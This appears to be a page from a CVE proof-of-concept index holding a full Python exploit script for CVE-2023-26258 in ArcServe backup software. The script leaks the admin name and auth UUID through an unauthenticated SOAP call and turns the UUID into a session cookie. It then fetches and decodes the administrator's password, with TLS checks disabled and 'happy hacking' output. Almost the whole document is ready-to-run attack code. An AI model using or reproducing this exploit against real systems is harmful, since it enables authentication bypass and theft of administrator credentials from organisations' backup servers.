4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-26258
README.md
Rendering markdown...
POC / ArcServe-exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3

# ArcServe Exploit by Juan Manuel Fernandez (@TheXC3LL) - MDSec

import sys
import requests
import urllib3
import base64
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


adminname = ""

def getUUID(ip):
    payload = '<?xml version=\'1.0\' encoding=\'UTF-8\'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:getVersionInfo xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"></ns2:getVersionInfo></S:Body></S:Envelope>'
    req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl', data=payload, verify=False, allow_redirects=False)
    output = req.text
    global adminname
    adminname = output[output.find('<ns5:adminName>') + 15:output.find('</ns5:adminName>')]
    uuid = output[output.find('<ns5:authUUID>') + 14:output.find('</ns5:authUUID>')]
    print("\t[+] AdminName: "+  adminname)
    print("\t[+] AuthUUID: "+ uuid)
    return uuid

def getSession(ip, uuid):
    payload = '<?xml version=\'1.0\' encoding=\'UTF-8\'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUUID xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"><arg0>' + uuid + '</arg0></ns2:validateUserByUUID></S:Body></S:Envelope>'
    req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/VirtualStandbyServiceImpl', data=payload, verify=False, allow_redirects=False)
    output = req.text
    if req.status_code == 200:
        cookie = req.headers["Set-Cookie"]
        session = cookie[:cookie.find(";")]
        print("\t[+] Session: " + session)
        return session

def validate(ip, session):
    payload = '<?xml version=\'1.0\' encoding=\'UTF-8\'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:getLocalHostAsTrust xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"></ns2:getLocalHostAsTrust></S:Body></S:Envelope>'
    headers = {'Cookie': session}
    req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl', data=payload, headers=headers, verify=False, allow_redirects=False)
    if req.status_code == 500:
        print("[!] Failed. Session is invalid :(")
    else:
        print("[*] Session is valid")
        output = req.text

        print("\t[+] Admin: "  + adminname)

        if output.find('<ns5:password>') == -1:
            print("\t[-] No password returned")
        else:
            password = output[output.find('<ns5:password>') + 14:output.find('</ns5:password>')]

            try:
                 password = base64.b64decode(password)
            except:
                 try:
                     password = base64.b64decode(password + "=")
                 except:
                     password = base64.b64decode(password + "==")
            password = password[0x80:]
            final = []
            for x in password:
                final.append(str(x))
            print("\t[+] Password: {" + ', '.join(final) + "}; // Paste it to the decrypter")

        print("\n\nHave a happy hacking! ^_^")


if __name__ == '__main__':
    print("\t\t-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-\n\n")
    if len(sys.argv) != 2:
        print("[!] Error! Syntax: ArcPwn.py <IP>")
        exit(-1)
    target = sys.argv[1]
    print("[*] Triggering info leak")
    uuid = getUUID(target)
    print("[*] Getting a valid session")
    session = getSession(target, uuid)
    print("[*] Doing an authenticated request to validate if session is valid")
    validate(target, session)